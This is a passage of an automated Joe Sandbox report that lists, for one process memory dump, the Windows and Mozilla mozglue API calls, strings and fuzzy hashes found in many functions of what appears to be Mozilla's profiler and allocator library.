                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                  • String ID:
                                                                  • API String ID: 112305417-0
                                                                  • Opcode ID: afbee9827efe72ba1615c5d081d73ccde8f5923fc3acbc6f72c2320a797d8f52
                                                                  • Instruction ID: 52999cb1d416517ce188bda2600536f01b8befaa69c7d48961499bc15a06a11c
                                                                  • Opcode Fuzzy Hash: afbee9827efe72ba1615c5d081d73ccde8f5923fc3acbc6f72c2320a797d8f52
                                                                  • Instruction Fuzzy Hash: 0B518D766017109BD725EBE8C8807EFB3F6AF95308B950518DC5A53B02DB31B91BCB92
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0531A7), ref: 6C08CDDD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 4275171209-2186867486
                                                                  • Opcode ID: 5295ae875b564775def2bc6e5c24343bd5962f7292ff7d35c999cb76963e568a
                                                                  • Instruction ID: dd1301cfe661e6e6c9c27b5aeaadb3cfc042cff45a37772c7abdd767738b49cf
                                                                  • Opcode Fuzzy Hash: 5295ae875b564775def2bc6e5c24343bd5962f7292ff7d35c999cb76963e568a
                                                                  • Instruction Fuzzy Hash: 6C3194307422155BFF10AFA58C45BAE7BF5BB45758F208219FA15ABA80DF70E5008BA5
                                                                  APIs
                                                                    • Part of subcall function 6C08FA80: GetCurrentThreadId.KERNEL32 ref: 6C08FA8D
                                                                    • Part of subcall function 6C08FA80: AcquireSRWLockExclusive.KERNEL32(6C0DF448), ref: 6C08FA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C096727
                                                                  • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C0967C8
                                                                    • Part of subcall function 6C0A4290: memcpy.VCRUNTIME140(?,?,6C0B2003,6C0B0AD9,?,6C0B0AD9,00000000,?,6C0B0AD9,?,00000004,?,6C0B1A62,?,6C0B2003,?), ref: 6C0A42C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                  • String ID: data$vl$3JT/
                                                                  • API String ID: 511789754-2665402509
                                                                  • Opcode ID: a5e435a30f1e0a099ac717b4cd6cdfdece4753bf3db5531032ec64d75a230a47
                                                                  • Instruction ID: 86976d440ae964c9cc8161de3f1492db024cdb363e1156856dacdcd014f3cc51
                                                                  • Opcode Fuzzy Hash: a5e435a30f1e0a099ac717b4cd6cdfdece4753bf3db5531032ec64d75a230a47
                                                                  • Instruction Fuzzy Hash: F9D1DD75A083408FD764CF64C850B9FB7E6AFC5308F10892DE58987B91EB30A949CB92
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0A9BAE
                                                                  • free.MOZGLUE(?,?), ref: 6C0A9BC3
                                                                  • free.MOZGLUE(?,?), ref: 6C0A9BD9
                                                                    • Part of subcall function 6C0A93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0A94C8
                                                                    • Part of subcall function 6C0A93B0: free.MOZGLUE(6C0A9281,?), ref: 6C0A94DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 956590011-2178588373
                                                                  • Opcode ID: 75bab5780873162a6b808bba6129d1da7a42e66257958a330728cd42f99f6951
                                                                  • Instruction ID: f040496cfce9f8a1bdad4edeb6e7e8fc580e28d11f67db26c0eb626627810774
                                                                  • Opcode Fuzzy Hash: 75bab5780873162a6b808bba6129d1da7a42e66257958a330728cd42f99f6951
                                                                  • Instruction Fuzzy Hash: 9BB19175A047058BCB05CF98C88069FF3F5BFC9328F548619E8599B741EB32E946CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3JT/
                                                                  • API String ID: 0-2178588373
                                                                  • Opcode ID: 1cfd88d3f297768b434473ca53ac292d4fe3f400491fa33c17c91fb8963f472a
                                                                  • Instruction ID: aea3c41df34067497d6d77c16af4a7c9f2da304b07f0524260bb38baf318c1e5
                                                                  • Opcode Fuzzy Hash: 1cfd88d3f297768b434473ca53ac292d4fe3f400491fa33c17c91fb8963f472a
                                                                  • Instruction Fuzzy Hash: 09A158B0A046058FDB14CF29C584B99FBF5BF49308F44866ED84A97B00EB30BA85CF94
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0B14C5
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0B14E2
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0B1546
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C0B15BA
                                                                  • free.MOZGLUE(?), ref: 6C0B16B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1909280232-2178588373
                                                                  • Opcode ID: 46393ea82eea619b5a47e4f0bc08a4a8302a671f89e83b1c521bfcaceafe6ea5
                                                                  • Instruction ID: a5d5b6e0fced499d26de4c37bb443e7ff91ceba923add2abe111da8e51edc07f
                                                                  • Opcode Fuzzy Hash: 46393ea82eea619b5a47e4f0bc08a4a8302a671f89e83b1c521bfcaceafe6ea5
                                                                  • Instruction Fuzzy Hash: A061AC76A007449BDB21CF64C880BDAB7F5BF89308F44851CED8A67611EB31F999CB91
                                                                  APIs
                                                                  • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0AC1F1
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C0AC293
                                                                  • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C0AC29E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: fgetc$memcpy
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1522623862-2178588373
                                                                  • Opcode ID: 905bf2c29b004cc33159f9a5c3eaa170dfd486ca672aaf7725191df22a246721
                                                                  • Instruction ID: 7e7651e05311c8fff09d73b472cb8d4538fc17034bad7185af29b714fce08a95
                                                                  • Opcode Fuzzy Hash: 905bf2c29b004cc33159f9a5c3eaa170dfd486ca672aaf7725191df22a246721
                                                                  • Instruction Fuzzy Hash: 5E61AC71A04218CFCF14DFE8D8806AEBBF5FF49314F164529E912A7651C732A946CFA1
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0A9FDB
                                                                  • free.MOZGLUE(?,?), ref: 6C0A9FF0
                                                                  • free.MOZGLUE(?,?), ref: 6C0AA006
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0AA0BE
                                                                  • free.MOZGLUE(?,?), ref: 6C0AA0D5
                                                                  • free.MOZGLUE(?,?), ref: 6C0AA0EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 956590011-2178588373
                                                                  • Opcode ID: 9ce61127e005a343908445fc5914fca3322d6902dce3995238127da9ce7b9990
                                                                  • Instruction ID: d4576d20c65f609f822c290d7be4dbbb8c5dbef50b393afebff173a5172b8b3b
                                                                  • Opcode Fuzzy Hash: 9ce61127e005a343908445fc5914fca3322d6902dce3995238127da9ce7b9990
                                                                  • Instruction Fuzzy Hash: B761A1755086019FC715CF98C48069AB3F5FF88328F548659E8599B702E732F986CFD1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(0000000C,?,6C0BB80C,00000000,?,?,6C06003B,?), ref: 6C060A72
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • moz_xmalloc.MOZGLUE(?,?,6C0BB80C,00000000,?,?,6C06003B,?), ref: 6C060AF5
                                                                  • free.MOZGLUE(00000000,?,?,6C0BB80C,00000000,?,?,6C06003B,?), ref: 6C060B9F
                                                                  • free.MOZGLUE(?,?,?,6C0BB80C,00000000,?,?,6C06003B,?), ref: 6C060BDB
                                                                  • free.MOZGLUE(00000000,?,?,6C0BB80C,00000000,?,?,6C06003B,?), ref: 6C060BED
                                                                  • mozalloc_abort.MOZGLUE(alloc overflow,?,6C0BB80C,00000000,?,?,6C06003B,?), ref: 6C060C0A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$moz_xmalloc$mallocmozalloc_abort
                                                                  • String ID: alloc overflow
                                                                  • API String ID: 1471638834-749304246
                                                                  • Opcode ID: ecb87af9214f648f4713c82451ebe7e981d0d6c6c18ffbd93f508ae3a21ecbf6
                                                                  • Instruction ID: c62e527114c0b0f44413a08745bcf868b8d7f932f9b758a370296303978fbfe6
                                                                  • Opcode Fuzzy Hash: ecb87af9214f648f4713c82451ebe7e981d0d6c6c18ffbd93f508ae3a21ecbf6
                                                                  • Instruction Fuzzy Hash: E751B0B4A482468FDB24CF29C880B9EB3F5EF4834CF14896DC85A9BA01EB71B554CB55
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C094AB7,?,6C0543CF,?,6C0542D2), ref: 6C094B48
                                                                  • free.MOZGLUE(?,?,?,80000000,?,6C094AB7,?,6C0543CF,?,6C0542D2), ref: 6C094B7F
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C094AB7,?,6C0543CF,?,6C0542D2), ref: 6C094B94
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C094AB7,?,6C0543CF,?,6C0542D2), ref: 6C094BBC
                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C094AB7,?,6C0543CF,?,6C0542D2), ref: 6C094BEE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                  • String ID: pid:$3JT/
                                                                  • API String ID: 1916652239-1990143079
                                                                  • Opcode ID: 4e6045a82f3f21dcbaf2868ffe26e96a52fe2b61528071f886c7c0c973d8f85f
                                                                  • Instruction ID: 6cef8c44dca4c4785fadcc17c0c91a2cb5a0c1620ebf00eeb9cc8182fb90f0ee
                                                                  • Opcode Fuzzy Hash: 4e6045a82f3f21dcbaf2868ffe26e96a52fe2b61528071f886c7c0c973d8f85f
                                                                  • Instruction Fuzzy Hash: 2C41B7717042559BCB14CFB8DC8079FBBF9EF85224B144638E869D7781DB30A908C7A5
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000001), ref: 6C09CA57
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09CA69
                                                                  • Sleep.KERNEL32 ref: 6C09CADD
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09CAEA
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C09CAF5
                                                                  • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C09CB19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 432163150-2178588373
                                                                  • Opcode ID: 9c57241def9622f4b8c0e2e3a9bec55b74ec85f4a641edee9865c38d011af7ef
                                                                  • Instruction ID: 9881f5b98c3193c19c13b13264d865e8d5b33304c9f45913e6c3f4eac205ec75
                                                                  • Opcode Fuzzy Hash: 9c57241def9622f4b8c0e2e3a9bec55b74ec85f4a641edee9865c38d011af7ef
                                                                  • Instruction Fuzzy Hash: 52212331A047088BC708AB3888543AFF7F9FFC6349F408628E855A7680FF70A5888791
                                                                  APIs
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C0AC82D
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C0AC842
                                                                    • Part of subcall function 6C0ACAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C0CB5EB,00000000), ref: 6C0ACB12
                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C0AC863
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C0AC875
                                                                    • Part of subcall function 6C08B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C0CB636,?), ref: 6C08B143
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C0AC89A
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0AC8BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2745304114-2178588373
                                                                  • Opcode ID: 0a27e340dd896202af162f66a05c2b2a22246e26e094170a36bc237f25118ad8
                                                                  • Instruction ID: 13d0234d21717f7f9979ea3223212d5a001d3f5985b8773cc1a7d1e3fe5fce54
                                                                  • Opcode Fuzzy Hash: 0a27e340dd896202af162f66a05c2b2a22246e26e094170a36bc237f25118ad8
                                                                  • Instruction Fuzzy Hash: FA116375B002099BCF04DFE4C885AAE7BF5FF89354B114129EA0697341EF31B905CB91
                                                                  APIs
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                  • __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  Strings
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C099459
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C09946B
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C09947D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                  • API String ID: 4042361484-1628757462
                                                                  • Opcode ID: 634facdcc7720299c425679b49c2e651bdd7cba607a8ee0174f0e9c0da9d1221
                                                                  • Instruction ID: 24a379140524b9c159ffed0c6e570edcbf997dcbec0de64fc75b7f9ab899a280
                                                                  • Opcode Fuzzy Hash: 634facdcc7720299c425679b49c2e651bdd7cba607a8ee0174f0e9c0da9d1221
                                                                  • Instruction Fuzzy Hash: 1501D470A002018BDB009B6CD815F4E33FDAB0672AF158637ED0E86B91EE31F964995F
                                                                  APIs
                                                                  • free.MOZGLUE(?,?,?,6C054667,?,?,?,?,?,?,?,?,6C094843,?), ref: 6C054C63
                                                                  • free.MOZGLUE(?,?,?,6C054667,?,?,?,?,?,?,?,?,6C094843,?), ref: 6C054C89
                                                                  • free.MOZGLUE(?,?,?,6C054667,?,?,?,?,?,?,?,?,6C094843,?), ref: 6C054CAC
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,6C094843,?), ref: 6C054CCF
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,6C094843,?), ref: 6C054CF2
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,6C094843,?), ref: 6C054D15
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,6C094843,?), ref: 6C054D38
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C054667,?,?,?,?,?,?,?,?,6C094843,?), ref: 6C054DD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$_invalid_parameter_noinfo_noreturn
                                                                  • String ID:
                                                                  • API String ID: 1497960986-0
                                                                  • Opcode ID: f7b3fea20c28a95aa143bfa475903932c1866df8817be552e21c36412e8cdb0b
                                                                  • Instruction ID: fc84df4037658be1fcb40fec9ae518344ab76ed56e772ebc19b5d762f1881582
                                                                  • Opcode Fuzzy Hash: f7b3fea20c28a95aa143bfa475903932c1866df8817be552e21c36412e8cdb0b
                                                                  • Instruction Fuzzy Hash: 35515071504A409FE7388A7CDAA479A76E1AF42328F844B1CE0A7CBFD1D735A4748B52
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,6C061999), ref: 6C05EA39
                                                                  • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C05EA5C
                                                                  • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C05EA76
                                                                  • moz_xmalloc.MOZGLUE(-00000001,?,?,6C061999), ref: 6C05EA9D
                                                                  • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C061999), ref: 6C05EAC2
                                                                  • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C05EADC
                                                                  • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C05EB0B
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C05EB27
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
